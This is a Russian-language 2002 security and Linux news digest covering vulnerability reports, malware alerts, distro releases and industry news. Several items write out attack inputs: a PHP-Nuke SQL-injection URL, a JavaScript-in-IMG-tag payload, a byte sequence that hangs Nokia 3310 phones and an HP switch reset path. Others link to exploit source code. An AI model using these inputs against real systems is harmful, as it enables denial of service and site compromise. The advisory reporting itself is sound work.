QT - это набор инструментов и библиотек, упрощающих разработку GUI для X Window System. Разработка trolltech для X Window System (Unix/X11), есть возможность портирования в ОС WinNT (9x). QtAssistant(assistant)-инструмент просмотра документации для QT Development. Фактически является HTML-броузером для просмотра документации в формате HTML. Когда программа "assistent" вызывается из программы Designer (QT IDE для работы с QT), она открывает порт 7358 для взаимодействия между обоими программами (активизируется нажатием Ctrl-M) по протоколу IPC (InterProcessCommunication). Cуть уязвимости заключается в том, что удалённый пользователь, подключившийся к порту 7358 машины, на которой запущен QT Assistant, получает неавторизованный доступ к локальным HTML-страницам. Хотя это и не является большой брешью в безопасности системы (разработчики оценили это как feature, а не как bug), существует возможность выполнения атаки типа DoS при открытии большого количества сессий. Рекомендуется фильтровать порт на внешнем файрволле. Проверялось на QTDocumentation Browser 1.0 в версии QT 3.0.3. Подробности - http://lists.trolltech.com/qt-interest/2002-09/thread00549-0.html
2/10/2002 09:31 Уязвимость в fetchmail.
Stefan Esser обнаружил уязвимость в Fetchmail в версии 6.0.0 и ниже. Обнаружены различные возможности переполнения буфера и нверное определение граничных условий (broken boundary check). Атаки, приводящие к этим условиям могут проводиться удалённо и позволяют получить статус суперпользователя (или пользователя, от имени которого запущен fetchmail) на атакуемом сервере. При этом необходимо, чтобь fetchmail был запущен в multidrop-режиме. Уязвимости связано с некорректным заданием значения BUFSIZ, неверное проверкой границ в функции getmxrecord() и разборе заголовка "Received:" в функции parse_received(). Специальным образом оформленный заголовок "Received:" может привести к выполнению на машине произвольного кода. Подробности - http://security.e-matters.de/advisories/032002.html
1/10/2002 17:39 Linux Mandrake 9.0 - первые впечатления.
Сразу после выхода Linux Mandrake 9.0 в сети появилось несколько кратких обзоров данной версии популярного дистрибутива. Обзоры охватывают работу с системой начиная от процесса установки и заканчивая настройкой OS. Обзор на linuxorbit.com - http://www.linuxorbit.com/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id=17 Обзор на linuxhelp.net - http://www.linuxhelp.net/reviews/mandrake90.php
1/10/2002 17:32 В лондоне открыт Linux-магазин.
В самом центре британской столицы открыт магазин, специализирующийся на продаже Linux ПO. Причиной, побудившей несколько инвестиционных компаний вложить средства в данный проект, стали высказывания Анди Кэша (IBM) о том, что использование OS Linux в современных банковских системах способно сэкономить порядка 30% затрат на ПО. Источник - http://news.zdnet.co.uk/story/0,,t269-s2123112,00.html
1/10/2002 17:23 Вместо версии 2.6 ядра Linux может быть выпущена версия 3.0
В Linux Kernel Mailing List, рассылке разработчиков ядра Linux, бурно обсуждается, какой номер должен быть присвоен следующей ветви ядра открытой операционной системы. Очередной стабильной ветвью должна была стать 2.6. Однако один из разработчиков ядра Linux Джефф Гаржик отметил, что темпы работы над новыми версиями ядра позволяют назвать следующую стабильную ветвь ядра не 2.6, а 3.0. Создатель Linux Линус Торвальдс ответил, что не видит причины, по которой нужно перескакивать сразу к 3.0. Подробности - http://www.compulenta.ru/2002/9/30/34343/
1/10/2002 11:54 Tanatos: "червяк" с "троянцем" в кармане.
"Лаборатория Касперского" сообщает об обнаружении нового Интернет-червя "Tanatos", распространяющегося по электронной почте и похищающего с компьютеров конфиденциальную информацию. На данный момент получены сообщения о фактах заражения данной вредоносной программой из Англии. "Tanatos" представляет собой приложение Windows размером около 50 килобайт (упакован утилитой сжатия UPX) написанном на языке программирования Microsoft Visual C++. Червь распространяется во вложенных файлах электронной почты, причем рассылаемые письма имеют различные заголовки, тексты и имена вложений. После доставки в почтовый ящик потенциальной жертвы, "Tanatos" ждет, когда письмо будет прочитано (например, в панели предварительного просмотра) и тогда, используя брешь "IFRAME" в системе безопасности Internet Explorer, незаметно заражает компьютер. В процессе заражения червь регистрируется в ключе автозапуска системного реестра Windows, так что вредоносная программа будет активизироваться при каждой перезагрузке Windows. "Tanatos" также устанавливает клавиатурный "жучок" (файл KEYLOGGER.DLL в системном каталоге Windows), благодаря которому записывает в специальный файл весь набираемый на компьютере текст. Подробности - http://www.kaspersky.ru/news.html?id=979347
1/10/2002 11:40 Выпущен "Пакет Обновлений 1" для Антивируса Касперского для MS Exchange Server.
"Лаборатория Касперского" выпустила "Пакет Обновлений 1", который содержит дополнительные функции для Антивируса Касперского(tm) для MS Exchange Server (версия 4.2), предотвращающие атаку защищенных систем через брешь в системе безопасности, связанной с методикой фрагментации и сборки сообщений ("Message Fragmentation and Reassembly"; описана в RFC2046, раздел 5.2.2.1). Данная методика позволяет разбивать отправляемые сообщения на фрагменты, которые могут быть некорректно проверены антивирусными фильтрами, использующими встроенный в MS Exchange антивирусный API. Пакет Обновлений устраняет данный недостаток, вводя специальные процедуры обработки фрагментированных сообщений. В случае с MS Exchange 2000 они блокируются, а в случае в MS Exchange 5.5 удаляются. Источник - http://www.kaspersky.ru/news.html?id=979338
1/10/2002 11:26 Cтатья "Авторизация доступа к Интернет на основе Windows NT' \ 2000 авторизации".
На сайте ARTmagic Studio выложена статья о том, как авторизировать Windows-пользователей в прокси-сервере SQUID на основе их доменных аккаунтов. По словам автора, статья представляет собой переработанный и дополненный (на основании собственного опыта, что очень важно) FAQ SQUID по настройке WinBIND-авторизации. Рекомендуется к прочтению сисадминам, занимающимся настройкой SQUID. По отзывам специалистов, статья очень толковая. Ссылка - http://www.artmagic.ru/labs/sqlandwin.shtml
1/10/2002 11:18 Эксплоит для Apache + OpenSSL на ОС FreeBSD.
На сайте packetstorm выложен экплоит, который использует уязвимость в библиотеке OpenSSL+Apache на ОС FreeBSD (до этого был выпущен экплоит только для Linux). Как написано на сайте, проверен на FreeBSD 4.4-STABLE, FreeBSD 4.4-RELEASE, FreeBSD 4.5-RELEASE, и FreeBSD 4.6-RELEASE-p1 с Apache-1.3.26 и Apache-1.3.19. Представляет собой модифицированный экплоит openssl-too-open.c (был опубликован ранее) для нахождения смещения (offset) для получения переполнения буфера. Исходник - http://packetstormsecurity.nl/0209-exploits/openssl-bsd.c
30/09/2002 18:41 Linux Red Hat 8.0 released.
Сегодня компания Red Hat сообщила о выходе новой версии своего дистрибутива Linux - Red Hat 8.0. Источник - http://www.desktoplinux.com/news/NS6763364476.html Скачать - ftp.redhat.com
30/09/2002 18:46 Судьба домена .su окончательно решена.
Первый день открывшейся сегодня 3-ей международной конференции "Состояние и перспективы развития Интернета в России" ознаменовался сенсацией общероссийского масштаба. Представитель ICANN(http://www.icann.net/) Герберт Вицтум, выступая на заседании секции "Саморегулирование в Интернете", сообщил, что поддержка домена .su корневыми серверами ICANN будет прекращена через 8 - 12 месяцев, причем этот вопрос является решенным и пересмотру не подлежит. В ответ на вопрос о том, насколько вероятно изменение решения ICANN в случае, если сторонники сохранения домена вступят в переговоры по данному поводу, г-н Вицтум ответил, что это совершенно исключено. Дело в том, что политика ICANN предполагает проведение консультаций с легитимными владельцами соответствующего TLD. В случае с доменом .eu такой легитимной стороной является руководство Евросоюза; в случае с доменом .eu такой легитимной стороной является руководство Евросоюза; в случае с доменом .ru - правительство Российской Федерации. Что же касается домена .su, то он был делегирован Советскому Союзу, - стране, которая не существует, как не существует и ее правительства. А раз нет правительства, - не с кем вести переговоры. Posted by: йцукенг Источник: http://www.provider.net.ru/news.php3?ts=1032975041
30/09/2002 10:48 Хакеры запустили Windows 2000 на Xbox.
Участники проекта Xbox-Linux, целью которого является запуск операционной системы Linux на игровой приставке Microsoft, изначально не предназначенной для этого, сообщили о том, что им удалось запустить на приставке не только Linux, но и операционную систему Windows 2000. Запуск Windows 2000 удалось произвести с помощью операционной системы Linux. Открытая ОС была использована как платформа, на которой было запущено широко распространенное ПО для запуска виртуального окружения, в котором может работать другая ОС, в том числе и Windows. Хакерам удалось обеспечить нормальную работу клавиатуры и мыши в Windows 2000, запущенной на Xbox, а также ряда других устройств, подключаемых через порт USB. Кроме того, удалось наладить сетевое подключение. По словам хакеров, Windows 2000 показывает довольно неплохую производительность, достаточную для воспроизведения MPEG4-фильмов в полноэкранном режиме. Различные приложения, такие как пакет программ Microsoft Office, также работают на Xbox без проблем. Источник - http://www.compulenta.ru
30/09/2002 10:45 "Null Pointer Bug" в компоненте mod_dav в Apache web сервере.
Уязвимость обнаружена в mod_dav (distributed authoring and versioning (DAV)) компоненте Apache web сервера. По сообщениям, удаленный атакующий может сконструировать специфический HTTP запрос, который заставит mod_dav использовать NULL указатель, что приведет к зависанию сервера. Уязвимость может использоваться некоторыми типами WebDAV клиентов. уязвимость обнаружена в Apache Software Foundation Apache 2.0-2.0.41. Выпущена версия 2.0.42, в которой подобная уязвимость устранена. Подробности - http://www.SecurityLab.ru/?ID=33273
30/09/2002 10:32 Раскрытие списка подписчиков на mail.ru.
Как известно, при работе с крупными почтовыми службами, серверы рассылок часто вместо индивидуальной отправки каждому подписчику отправляют одно письмо, снабдив его списком получателей. Примерно начиная с августа этого года, при доставке своим пользователям рассылок, полученных от служб MailList.Ru и Subscribe.Ru, популярная почтовая служба Mail.Ru вставляет (или оставляет) значительную часть списка адресов других подписчиков данной рассылки в заголовок X-Envelope-To. Нельзя сказать, что данный факт существенно отражается на безопасности пользователей, поскольку довольно жизнеспособный список адресов mail.ru можно получить, взяв любой словарь, разбавив его цифровыми комбинациями, но неприятный осадок от этого остается. Источник - http://www.bugtraq.ru
30/09/2002 10:23 Трубки Nokia 3310 подвержены DoS-атакам.
Как сообщается, существует возможность "завесить" трубки Nokia 3310, послав на них определённое сообщение. Результат атаки аналогичен по своему действию и последствиям атаке на сервер (сеть) типа DoS. Получив сообщение из четырех байтов (в hex-кодах 0x04 0x05 0x15 0x8A), трубка уйдет в даун на 10-15 секунд. После этого хозяин трубки не сможет вручную удалить сообщение. Так что для пользователей 3310 есть потенциальныя опасность словить DoS-атаку от недоброжелателей... Что произойдет когда кончится место на симке, стоит только догадываться.. Источник - http://www.mazafaka.ru/
30/09/2002 10:20 Установка ПО "оптом".
Корпорация IBM выпустила программный инструментарий для системных администраторов ImageUltra Builder, позволяющий упростить инсталляцию программного обеспечения на компьютеры в корпоративных сетях. Система создает и централизованно хранит образы программного обеспечения, ранее установленного на подключенные к сети ПК. Каждый такой образ может содержать уже сконфигурированные операционную систему, важнейшие приложения и базы данных. Служба IBM ImageUltra действует с октября прошлого года. Однако ранее образы формировались удаленно в специализированном центре IBM, и затем передавались на производственные линии для установки на ПК, заказанные пользователями службы. ImageUltra Builder создает образы самостоятельно, но их установка по-прежнему возможна только на оборудование IBM. Версия ImageUltra Builder, которая будет работать также с системами иных производителей, запланирована к выпуску. Источник - http://www.osp.ru
29/09/2002 23:56 Вычислительная машина для космоса.
Данная новость представляет интерес для людей. интересующихся вычислительной техникой специализированного назначения, к которой принадлежит БЦВМ "Аргон-16", которая входит в состав системы управления космических кораблей "Союз-ТМ", доставляющих в настоящее время экипажи на станцию МКС (международная космическая станция). Разработана в 1973 г. НИИ электронной вычислительной техники. В производство запущена с 1974 г. Впечатляют характеристики машины: время выполнения операций (мкс): сложения - 5 (200К. операций/сек), умножения 45. Объем ОЗУ - 3х2 Кб, ДЗУ - 3х16 Кб. И это при массе - 70 кг. Программное обеспечение: автоматизированная система программирования, включающая автокод с транслятором (на базе ЭВМ М-220), автоматизированная система отладки программ на базе ЭВМ М-222, программы тестового контроля. Особенности БЦВМ: исключительно высокая надежность, достигнутая благодаря схемно-техническим (троированная синхронная структура с аппаратными средствами мажоритирования) и конструктивно - технологическим решениям (печатные платы, изготовливаемые методом послойного наращивания), за 25 лет эксплуатации не было отмечено ни одного отказа комплекса в составе системы управления. По объему выпуска не имеет равных среди машин космического применения (выпущено 380 машин). Хотелось бы отметить, что в новом корабле "Союз-ТМА", старт которого намечен на конец октября, также стоит БЦВМ "Аргон-16". Подробная информация - http://www.computer-museum.ru/histussr/13-3.htm
29/09/2002 23:54 Секретные агенты проверяют безопасность беспроводных сетей в Вашингтоне.
На сайте securityfocus.com опубликована статья D. Ian Hopper из "Ассошиэйтед Пресс" под названием "Secret Service agents probe wireless networks in Washington". При проверке использовался обычный лэптоп и три антенны: одна - маленькая металлическая антенна, вторая-большая длинаая (2 фута ~ 60 cм.) труба и третья - самодельная антенна, сделанная из коробки от чипсов "Принглс" (!). Все антенны были установлены на автомобиле. Антенны приедназначеня для улучшения приёма сигнала на беспроводную сетевую карту лэптопа. Проехавшись по главной улице Вашингтона, секретный агент Петерсон обнаружил 20 беспроводных сетей, многие из которых не имели средств защиты от проникновения. Довольно занимательно описано использование коробки от чипсов "Принглс" - дословно: "A Pringles can is ideal because of its shape -- a long tube that lets someone to point it at specific buildings -- and its aluminum inner lining. It acts like a satellite dish, collecting signals and bouncing them to the receiver, which is then wired into a laptop." В заключении хотелось бы сказать, что в Штатах беспроводные сети получили широкое распространение и применяются в таких критически важных отраслях инфраструктуры государства, как аэропорты, государственные учреждения, железнодорожный транспорт. Подробности - http://online.securityfocus.com/news/899
29/09/2002 23:53 Выход SuSE 8.1.
Вышла новая версия дистрибутива Linux SUSE 8.1. Включает в себя: Kernel 2.4.19, glibc 2.2.5, gcc 3.2, Bootmanager: GRUB, Filesystems: ReiserFS, Ext3, JFS, XFS, Kryptofilesystem, YaST Logical Volume Manager, Postfix, YaST2 - Runleveleditor, Samba 2.2.5, Apache 1.3.20 & Apache 2.0.40, CUPS - Standard printsystem, CAPI/Fax-Support for ISDN. Sendmail заменён на Postfix, majordomo на mailman (программы по ведению списков рассылки). Судя по объявлению на сайте производителя ISO - образы будут доступны с 7 октября. Источник новости - CrownRU с linux.org.ru. Подробности -
29/09/2002 23:50 Уязвимость в ПО для работы с VPN в Windows 2000/XP.
В программном обеспечении для работы с виртуальными частными сетями (VPN), включенном в поставку ОС Windows 2000 и XP, обнаружена серьезная уязвимость. Как сообщила немецкая компания Phion Information Technologies, занимающаяся вопросами компьютерной безопасности, проблема заключается в реализации протокола PPTP. VPN, как правило, используется для удалённого подключения к локальным корпоративным сетям по защищённому каналу. Воспользовавшись дырой, злоумышленник может получить доступ к секретной информации, хранящейся на компьютерах пользователей. Уязвимость в VPN куда опаснее аналогичной дыры в системе безопасности веб-сервера, считают в компании eEye Digital Security, поскольку никто не ожидает проникновения в сеть с этой стороны. Все системы защиты направлены против атаки извне, а пользователи, подключающиеся через VPN, получают доступ прямо к внутренней сети. Представитель Microsoft Кристофер Бадд заявил, что программисты компании уже работает над решением проблемы. В скором времени будет выпущен патч, решающий все вопросы с уязвимостью ПО, используемого для работы с VPN. Источник - http://www.compulenta.ru
29/09/2002 23:00 Cтатья "Руководство ответственного за устранение инцидентов в Win2k"
Сайт securitylab.ru порадовал очередным переводом статьи с securityfocus. Название статьи "Руководство ответственного за устранение инцидентов в Win2k", перевод-Михаила Разумова. Статья содержит краткий обзор некоторых действий, которые следует предпринимать в первую очередь при возникновении инцидентов безопасности (точнее - при нарушении безопасности системы - прим. newsmaker). Статья ориентирована на инциденты в Microsoft Windows 2000, вследствие ее популярности в корпоративных и серверных приложениях. Многие темы, обсуждаемые в этой статье, применимы для других платформ, и многие из обсуждаемых методик и инструментов могут также применяться на NT и XP системах. Cтатья - http://www.securitylab.ru/?ID=33264
28/09/2002 17:43 Вышёл Linux 2.5.39.
Линус Торвальдс сообщил о выходе очередной версии нестабильного ядра Linux 2.5.39. Изменения в USB, JFS, XFS, networking, debugging etc. Полный Changelog - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.39
28/09/2002 17:14 Microsoft признала наличие уязвимости в серверных расширениях FrontPage.
Компания Microsoft признала наличие уязвимости в серверных расширениях FrontPage, которая делает сайт доступным для хакерских атак типа "denial-of-service" ("отказ в обслуживании") или "переполнение буфера". Как говорится в официальном сообщении Microsoft, эта ошибка была обнаружена в серверных расширениях FrontPage 2000 и 2002, работающих на серверах под управлением операционных систем Windows 2000 и XP. Ошибка связана с интерпретатором SmartHTML (динамическая библиотека shtml.dll), который отвечает за создание интерактивных форм на сайте, а также за прочий динамически генерирующийся контент. Злоумышленник имеет возможность послать на сервер особым образом написанный запрос, вследствие которого будут либо полностью загружены вычиспительные ресурсы процессоров сервера, что приведет к недоступности сайта, либо возникнет переполнение буфера, что позволит запустить исполнение произвольного кода. Специалисты Microsoft предлагают два решения этой проблемы: либо удалить интерпретатор SmartHTML с сервера, либо установить специальную "заплатку", которую можно скачать здесь. Источник - http://www.compulenta.ru Заплатка - http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-053.asp
28/09/2002 16:57 Cтатья "Уязвимости алгоритма и семейства протоколов Spanning Tree"
Вашему вниманию предлагается статья Олегом Артемьевым и Владиславом Мяснянкиным. Статья впервые была опубликована в журнале "LAN" ( #1 2002 г.) под названием "Опасные деревья в сетевых лесах". Статья посвящена обзору уязвимостей, присущих протоколу Spanning Tree Protocol (STP), который предназначен для автоматического управление топологией сети с дублирующими каналами и применяется в сети, построенной на базе коммутаторов. Помимо обзора самого протокола, а также присущих ему уязвимостей (отсутствие механизмов аутентификации), авторы рассматривают типичные примеры атак, которые можно организовать в подобной сети: вечные выборы, исчезновение корня, слияние-расхождение деревьев, фильтр BPDU, незаконный посредник (man in the middle), спровоцированный сниффинг и т.д. Также авторы рассматривают способы обнаружения атак и защиты от них. В данный момент готовится переработанный и дополненный вариант статьи на сервере www.bugtraq.ru. Электронный вариант статьи - http://www.osp.ru/lan/2002/01/088.htm PDF-вариант - http://olli.digger.org.ru/Projects/STP/Defender_Info_1_02.pdf
27/09/2002 17:28 MySQL "взрослеет".
В СУБД MySQL Pro, которую компания MySQL AB разрабатывает для применения на предприятиях, появится полноценная поддержка транзакций. До сих пор соответствующие функции присутствовали только в экспериментальной версии СУБД с открытым кодом - MySQL Max. Отсутствие механизма транзакций, способного обеспечить высокую производительность и масштабируемость в условиях одновременной работы с СУБД большого количества пользователей, до сих пор служило главным препятствием к применению MySQL на предприятиях. Встроенная в MySQL Pro технология InnoDB поддерживает возможность совершения транзакций, отката и восстановления после сбоев. Предусмотрена поддержка блокировки на уровне строк и возможность выполнения неблокирующих операций считывания, выполняющихся быстро даже при высокой загруженности СУБД. MySQL имеет фиксированную стоимость в расчете на сервер. Posted by: BioHazard. Источник - http://www.osp.ru/news/soft/2002/09/25_01.htm
27/09/2002 17:26 Уязвимость в http-сервере OpenVMS.
Обнаружены серьёзные уязвимости в WASD VMS Hypertext Services - популярном http-сервере для ОС OpenVMS, выпускаемом под лицензией GNU GPL. Обнаруженных уязвимостей очень много, вот краткий список некоторых из них: возможность просмотра всего дерева файлов сервера, возможность обхода правил доступа к серверу (access control rules), возможность получения корневого документа Вэб-сервера, доступ к файлу конфигурации Вэб-сервера, доступ к логам http-сервера, доступ на чтение к системным файлам OpenVMS и т.д. Комбинация этих уязвимостей может привести к получению злоумышленником прав пользователя SYSTEM (аналог root). Всё вышеприведенное присутствует в версии 8.0, 7.0, 7.2. Для устранения уязвимости рекомендуют обновить сервер до версий 8.1 и 7.2.4. Подробное описание - http://jl.gailly.net/security/wasd-vuln-2002-09.txt
27/09/2002 17:25 На сайте новая статья: Микстура против ЧИХ-а или По следам "Чернобыльского" вируса.
На примере вируса Win95.CIH рассматриваются некоторые малоизвестные особенности организации Win32 и методы самостоятельного исследования и уничтожения компьютерных вирусов. Ознакомиться: http://www.uinc.ru/articles/35/index.shtml
27/09/2002 17:10 Переполнение буфера в gv.
Компания iDEFENSE, Inc. cообщает об обнаруженной ей уязвимости в gv (ghostscript viewer)-программе для просмотра PDF-файлов в UNIX-подобных ОС. Уязвимость проверялась в версии gv 3.5.8 и ОС Red Hat Linux 7.3. Заключается она в том, что существует возможность посылки жертве специальным образом сформированного PDF-файла. При просмотре подобного файла в gv можно получить шелл с правами пользователя, просматривающего этот файл (т.к. бита SUID на программе не стоит-"зарутиться" не представляется возможным). Существует один нюанс. Для осуществления атаки необходимо, чтобы имя файла было введено из командной строки, при просмотре файла из GUI-интерфейса уязвимость не проявляется. Уязвимость существует из-за неправильного (unsafe в оригинале) вызове функции sscanf() при интерпретации PostScript, PDF-файлов. Zen-parse выпустил пример подобного файла, в котором переполнение буфера и шеллкод скрыты в секции "%%PageOrder:" PDF-файла. Номер уязвимости в классификации CVE - CAN-2002-0838. Источник - http://www.idefense.com/
27/09/2002 14:02 Удалённая уязвимость в PPTP-сервере и клиенте от Microsoft.
Phion Information Technologies обнаружена уязвимость в клиенте и сервере PPTP (point-to-point tunneling protocol), реализованных в ОС WinXP и Win2K (c 3-им сервис-паком). Подобная уязвимость позволяет удалённо выполнить атаку типа DoS, а также, в некоторых случаях, возможность получения шелла на атакуемой машине, поскольку существет возможность переписи регистров EDI и EDX своим кодом. Клиенты PPTP тоже уязвимы для этого вида атаки, поскольку запускается сервис, прослушивающий порт 1723 - это особенно актуально для пользователей DSL, которые используют PPTP для соединения со своими модемами. В качестве временной меры противодествия авторы рекомендуют пользователям WinXP перекрывать этот порт встроенным файрволлом Internet Connection Firewall (ICF) на стороне клиента PPTP. Для серверов PPTP в WinXP, Win2K подобной защиты не существует. Подробности уязвимости пока не разглашаются, эксплоит авторами тоже пока не выпущен. Источник - http://www.phion.com/adv/index.html
27/09/2002 13:41 RC5-64 ключ для distributed.net найден!
14 июля 2002 года, обычный PIII-450 в Токио вернул победный ключ на кей-сервера distributed.net. Ключ 0x63DE7DC154F4D03 содержал простой текст: "The unknown message is: some things are better left unread". К сожалению, из-за неисправности в скриптах, информации о том, что ключ найден не было вплоть до 12 августа. Ключ был немедленно отправлен в RSA Labs и заверен, как победный. Итак, спустя 1,757 дней и 58,747,597,657 проверенных блоков ключ был найден! В проекте приняло участие 331,252 человек. Posted by: L0rda Источник - http://www.distributed.net/pressroom/news-20020926.html
27/09/2002 10:49 Linux переименуют?
Free Software Foundation (FSF) во главе с Ричардом Столманов направила открытое письмо Linux сообщество с предложением переименовать OS "Linux" в OS "GNU/Linux". Столман ститает что значительный взнос в популяризацию Linux внес и проект GNU, что и является основным аргументом данного заявления. Источник - http://www.vnunet.com/News/1135403
27/09/2002 1:20 Компания предлагает неуязвимую Linux
Молодая компания Guardian Digital пытается продавать устойчивую к атакам версию Linux и надеется закрепиться в этой нише рынка Unix-подобной операционной системы. Анонсированный во вторник продукт EnGarde Secure Professional представляет собой версию Linux с инструментами управления и серверным ПО, задача которых - противостоять внешним атакам. Продукт стоит 549 $, плюс 219 $ в год за обязательный сервис обновления ПО. Подробности - http://zdnet.ru/?ID=288578
26/09/2002 19:23 Linux Mandrake 9.0
Cегодня компания MandrakeSoft сообщила о выходе Linux Mandrake 9.0, названной "Dolphin". Источник - http://www.mandrakelinux.com/en/ Скачать - http://www.mandrakelinux.com/en/ftp.php3
26/09/2002 Эксплоит, использующий уязвимость OpenSSL в Apache.
На сайте www.securitylab.ru выложены исходники эксплоита, использующего уязвимость в OpenSSL. Этот исходник был опубликован в списке рассылки BUGTRAQ KF (dotslash@snosoft.com) 16 cентября. Является частично переботанным эксплоитом под названием PUD (Peer-to-peer UDP Distributed Denial of Service), изначально созданным contem@efnet. Исходник - http://www.securitylab.ru/?ID=33222
26/09/2002 Уязвимость в PHP-Nuke.
Обнаружена уязвимость в PHP-Nuke (в том числе и в недавно вышелшей 6-й версии). Подобная уязвимость носит название SQL injection и приводит к отказу в обслуживании запросов (DoS). Если сформировать запрос вида: http://www.nukesite.com/modules.php?name=News&file=article&sid=1234%20or%201=1 сервер подвиснет и машина станет недоступной для пользователей. После остановки скрипта сервер через некоторое время восстанавливается. Источник - http://www.linuxsecurity.com/articles/hackscracks_article-5776.html
26/09/2002 Уязвимости во многих CMS.
ECHU.ORG обнаружена уязвимость во многих CMS (Content Management System-системы управления содержимым Вэб-сервера), в числе которых называются: XOOPS, PHP-NUKE, NPDS, daCode, Drupal, phpWebSite. Заключается она в неправильной интерпртетации тега <IMG SRC=..>. Существует возможность вставки вместо корректного содержимого этого тега (рисунок, фотография) джава-скрипта (например, вида "javascript:alert('unsecure')"), что может быть использовано взломщика посещаемого Вэб-сайта. Как следут из переписки автора с создателями одного из CMS - XOOPS, это проблема не каждого конкретного CMS, а HTML в целом. Подобного рода атаки названы IMG attack. Подробнее - http://www.echu.org/modules/news/article.php?storyid=97
26/09/2002 Возможность перезапуска коммутаторов HP Procurve 4000M через HTTP.
HP Procurve 4000M - коммутатор (switch), применяющийся в компаниях среднего и большого объёма для организации работы в Ethernet-сетях на 10, 100 и гигабитных интерфейсах. В некоторых случаях подобные коммутаторы объединяются в "стеки" или цепочку коммутаторов в одной стойке. Для подобной ситуации предусмотрен случай, когда администратор может управлять работой стека коммутаторов удалённо, для чего стеку назначается IP-адрес и включается возможность управления коммутаторами через протокол HTTP. Как заметил Брук Пауэрс из Techserve, Inc. существует возможность посредством HTTP протокола перезагрузить стек коммутаторов, обратившись по определённому URL (автор приводит адрес "http:///sw2/cgi/device_reset?"). Фирма Hewlett Packard выпустила обновлённую версию ПО для своих коммутаторов - C.09.16 и рекомендует всем администраторам обновить ПО. Кроме того выпущен бюллетень по безопасности HPSBUX0209-219. Более подробно - www.tech-serve.com/research/advisories/2002/a092302-1.txt
26/09/2002 Cеминар "Безопасность файловой системы в Microsoft Windows 2000".
Компания SoftLine 1 октября 2002 г. проводит БЕСПЛАТНЫЙ семинар "Безопасность файловой системы в Microsoft Windows2000". Семинар будет посвящен обзору возможностей безопасного хранения данных и доступа к файлам и папкам на томах NTFS операционной системы Windows 2000. Основные вопросы: разрешения NTFS, шифрование файлов с помощью EFS, дисковые квоты, аудит файловых ресурсов, обзор инструментов управления безопасностью Windows 2000. Место проведения: г. Москва, ул. Губкина, д. 8 (здание математического института имени Стеклова Подробности - http://www.softline.ru/seminars
26/09/2002 Утечка из Red Hat.
По сообщениям News.Com, вчера произошла учечка части новой версии дистрибутива Linux Red Hat 8.0 в интернет. Официальный релиз был запланирован Red Hat на понедельник, однако уже вчера посетители сайта http://eu.uu.net/ имели доступ к частям новинки. Источник - http://news.com.com/2100-1001-959434.html?tag=lh
26/09/2002 UnitedLinux отвечает на претензии о соответствии лицензии GPL
На сайте компании Conectiva опубликовано открытое письмо, отвечающее на некоторые вопросы, которые вызвало появление бета-версии UnitedLinux. Так называется новый дистрибутив Linux, который разрабатывался несколькими крупными линукс-компаниями в качестве альтернативы Red Hat Linux. В открытом обращении к Фонду свободного софта (FSF) и сообществу разработчиков открытого ПО Conectiva заверила, что правила бета-тестирования полностью соответствуют GPL. В качестве доказательства приводится часть договора о неразглашении, который должны подписать все бета-тестеры ОС UnitedLinux. Он запрещает участникам бета-тестирования распространять программный код только в тех случаях, когда это не противоречит их лицензии. Это значит, что программам, распространяемым согласно GPL, ничего не грозит. По данным http://www.compulenta.ru/
26/09/2002 Проблемы с Service Pack 1 для Windows XP
Как сообщается на сайте PCWorld, некоторые пользователи операционной системы Windows, попытавшиеся установить первый пакет обновлений, выпущенный недавно компанией Microsoft, столкнулись с рядом серьезных проблем. Если судить по сообщениям в форумах, посвященных операционной системе Windows XP, то можно заметить, что многие пользователи жалуются на то, что производительность системы значительно замедляется после установки первого Service Pack. Один из пользователей сообщает, что различные приложения запускаются в "обновленной" системе чрезвычайно долго либо не запускаются вообще, причем это касается и собственных программ Microsoft. Подробности - http://www.compulenta.ru/2002/9/25/34225/
25/09/2002 IBM продвигает Linux в кино.
Сегодня между компанией IBM и Regal Entertainment Group (лидер кинопрокатного бизнеса) было заключено соглашение об использовании OS Linux в сфере продажи билетов в автоматизированых киосках REG производства IBM, число которых перевалило за 5000. Данный факт - очередной шаг Linux на рынке Embedded систем. Источник - http://www.atnewyork.com/news/article.php/1470151
25/09/2002 Lindows выбирает Netscape.
Вчера представитель компании Lindows сообщил о заключении договора с AOL Time Warner, согласно которому, браузер Netscape будет поставляться вместе с OS Lindows в качестве используемого по умолчанию... Подпобности - http://www.internetnews.com/bus-news/article.php/1469261
25/09/2002 Виртуальное воровство - Открываем замки любого дома
В результате совместной операции, проводимой компьютерными экспертами Скотланд-Ярда и ФБР, был арестован "выдающийся" хакер. 21-летний парень был задержан у себя дома в Surbiton, Суррей, по подозрению в составлении и распространении, так называемого экспертами "набора отмычек" для входа в компьютерную систему компаний. Компьютерное оборудование было изъято из его квартиры для проведения экспертизы специалистами по компьютерной преступности Скотланд-Ярда. Он был арестован согласно протокола о нарушении закаонодательства "О злоупотреблении компьютерными программами", 1990 г. и задержан для дачи показаний до следующего месяца. Подробности - http://www.crime-research.org/news/2002/09/2501.htm
25/09/2002 Разработка IE под UNIX остановлена.
Согласно сообщениям на Mozillazine, Microsoft прекратила разработку IE для UNIX. Официального заявления об этом небыло, однако такой вывод был сделан исходя из факта отсутствия ранее существовавших ссылок на "Microsoft's UNIX page", однако прямые ссылки на проект продолжают работать. Источник - http://www.osnews.com/story.php?news_id=1776
25/09/2002 У нашего ньюс-сервера появился сервер-двойник или позор плагиаторам!
Ньюс-сервера существуют в рунете в большом количестве. Многие из них также занимаются новостями в области компьютерной безопасности. К такой разновидности ньюс-серверов принадлежит и наш. Однако некоторые ньюс-сервера не гнушаются прямым плагиатом! К числу подобных серверов принадлежит "сете-террористический" сервер mazafaka.ru. Не в первый раз эти, с позволения сказать, представители компьютерного андеграунда вместо самостоятельного перевода новостей по компьютерной безопасности ТУПО-буква в букву воруют наши новости. Мы не против того, чтобы публиковали приводимые на нашем сервере новости, но при этом (согласно общепринятым правилам приличия) не мешало бы давать ссылку на наш сайт (как это делает, например, сайт www.hacksoft.ru)! Судя по скорости появления новостей на этом сайте (t+5 мин) надеюсь, что в течении ближайших 5-15 минут это сообщение увидит членЪ их "команды" djamix, перу которого и принадлежат все украденные с нашего сервера новости и попытается связаться с нами. Для сравнения - http://www.mazafaka.ru
25/09/2002 В семействе Slapper очередное пополнение.
